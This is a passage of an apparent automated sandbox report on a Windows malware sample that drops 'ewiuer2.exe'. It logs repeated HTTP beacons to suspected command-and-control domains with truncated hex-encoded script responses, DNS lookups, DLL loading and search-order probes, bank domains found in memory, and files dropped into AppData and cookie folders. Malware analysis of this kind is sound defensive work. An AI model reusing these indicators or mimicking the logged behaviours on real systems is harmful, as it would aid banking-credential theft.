\"GET /881/70.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>d6dg.:;55g68:4b81d92451c759d238__pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:09:17 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /91/622.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:09:29 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /922/654.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>h67haed7b9/:2`6c1:;0::2fhdc47:h._pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:09:41 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /851/52.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>2/56c242c:3fg_c7/d2b965g72bfaf5b_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:09:52 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /683/84.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>867:2ee1b3bg614gdg:`6:a9771246;1_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:10:04 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /514/116.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:10:16 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /349/128.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:10:27 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /949/928.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>d146789_:c`ge553c6;4e3b94b6c4c97_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:10:39 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /968/369.html HTTP/1.1\nFrom: 133833046141054708\nVia: lmc`pfx;495_qq>8/23\\lgw>6147bge`2f77259fab6.28.5f5:9`39b_pmdtwqv\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:10:51 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"mkkuei4kdsz.com\"\n \"ow5dirasuek.com\"\n \"podayl.net\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" has an executable section named \".text\"\n \"ewiuer2.exe\" has an executable section named \".text\"\n \"EWIUER2.EXE.67A482B6.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" has an writable section named \".data\"\n \"ewiuer2.exe\" has an writable section named \".data\"\n \"EWIUER2.EXE.67A482B6.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"KERNEL32\" at base 77050000\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b6c0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ewiuer2.exe\" loaded module \"KERNEL32\" at base 77050000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b6c0000\n \"ewiuer2.exe\" loaded module \"WS2_32.DLL\" at base 76ce0000\n \"ewiuer2.exe\" loaded module \"WINHTTP.DLL\" at base 70ef0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a00000\n \"ewiuer2.exe\" loaded module \"IPHLPAPI.DLL\" at base 73390000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 749f0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 72510000\n \"ewiuer2.exe\" loaded module \"DNSAPI.DLL\" at base 748c0000\n \"ewiuer2.exe\" loaded module \"RPCRT4.DLL\" at base 75a60000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76f60000\n \"ewiuer2.exe\" loaded module \"ADVAPI32.DLL\" at base 76fa0000\n \"ewiuer2.exe\" loaded module \"URLMON.DLL\" at base 75b10000\n \"ewiuer2.exe\" loaded module \"SECUR32.DLL\" at base 74d60000\n \"ewiuer2.exe\" loaded module \"OLEAUT32.DLL\" at base 76ec0000\n \"ewiuer2.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fc0000\n \"ewiuer2.exe\" loaded module \"CLBCATQ.DLL\" at base 77290000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6cbe0000\n \"ewiuer2.exe\" loaded module \"OLE32.DLL\" at base 75370000\n \"ewiuer2.exe\" loaded module \"DHCPCSVC6.DLL\" at base 732a0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74560000\n \"ewiuer2.exe\" loaded module \"DHCPCSVC.DLL\" at base 731c0000\n \"ewiuer2.exe\" loaded module \"RASADHLP.DLL\" at base 71760000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f60000\n \"ewiuer2.exe\" loaded module \"CRYPTSP.DLL\" at base 74a40000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 747d0000\n \"ewiuer2.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74fd0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6bfd0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 76ec0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 75c60000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73300000\n \"ewiuer2.exe\" loaded module \"COMCTL32.DLL\" at base 73f00000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 76ce0000\n \"ewiuer2.exe\" loaded module \"BCRYPT.DLL\" at base 74b50000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74710000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74ee0000\n \"ewiuer2.exe\" loaded module \"PROFAPI.DLL\" at base 75050000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70630000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75360000\n \"ewiuer2.exe\" loaded module \"KERNEL32.DLL\" at base 77050000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003168)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ewiuer2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ewiuer2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A60000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"ewiuer2.exe\" (UID: 00000000-00003444)\n Spawned process \"ewiuer2.exe\" (UID: 00000000-00004444)\n Spawned process \"ewiuer2.exe\" with commandline \"/nomove\" (UID: 00000000-00005220)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"ewiuer2.exe\" (UID: 00000000-00003444)\n Spawned process \"ewiuer2.exe\" (UID: 00000000-00004444)\n Spawned process \"ewiuer2.exe\" with commandline \"/nomove\" (UID: 00000000-00005220)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ewiuer2.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ewiuer2.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"EWIUER2.EXE.67A482B6.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"EWIUER2.EXE.67A482B6.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00003444.00000000.329766.001D0000.00000004.mdmp, 00000000-00003444.00000001.330143.001D0000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00003444.00000000.329766.001D0000.00000004.mdmp, 00000000-00003444.00000001.330143.001D0000.00000004.mdmp, Indicator: \"capitalone.com\")\n \"www.credit-agricole.fr\" (Source: 00000000-00004444.00000000.330444.00180000.00000004.mdmp, 00000000-00004444.00000001.331051.001E2000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00004444.00000000.330444.00180000.00000004.mdmp, 00000000-00004444.00000001.331051.001E2000.00000004.mdmp, Indicator: \"capitalone.com\")\n \"www.credit-agricole.fr\" (Source: 00000000-00005220.00000000.331367.00240000.00000004.mdmp, 00000000-00005220.00000001.333290.00240000.00000004.mdmp, 00000000-00005220.00000002.335213.00240000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00005220.00000000.331367.00240000.00000004.mdmp, 00000000-00005220.00000001.333290.00240000.00000004.mdmp, 00000000-00005220.00000002.335213.00240000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"ewiuer2.exe\" - Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00004444]\n Dropped file: \"N1W0UPWY.txt\" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N1W0UPWY.txt]- [targetUID: 00000000-00004444]\n Dropped file: \"7W4OOVRO.txt\" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7W4OOVRO.txt]- [targetUID: 00000000-00004444]\n Dropped file: \"JAPOZOO9.txt\" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JAPOZOO9.txt]- [targetUID: 00000000-00004444]\n Dropped file: \"KE4KSO93.txt\" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KE4KSO93.txt]- [targetUID: 00000000-00003444]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\version.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Secur32.dll\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SSPICLI.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\FLTLIB.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" reads file \"c:\\ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\windows\\system32\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\n1w0upwy.txt\"\n \"ewiuer2.exe\" reads file \"c:\\windows\\system32\\viesazm.mpk\"\n \"ewiuer2.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\japozoo9.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n 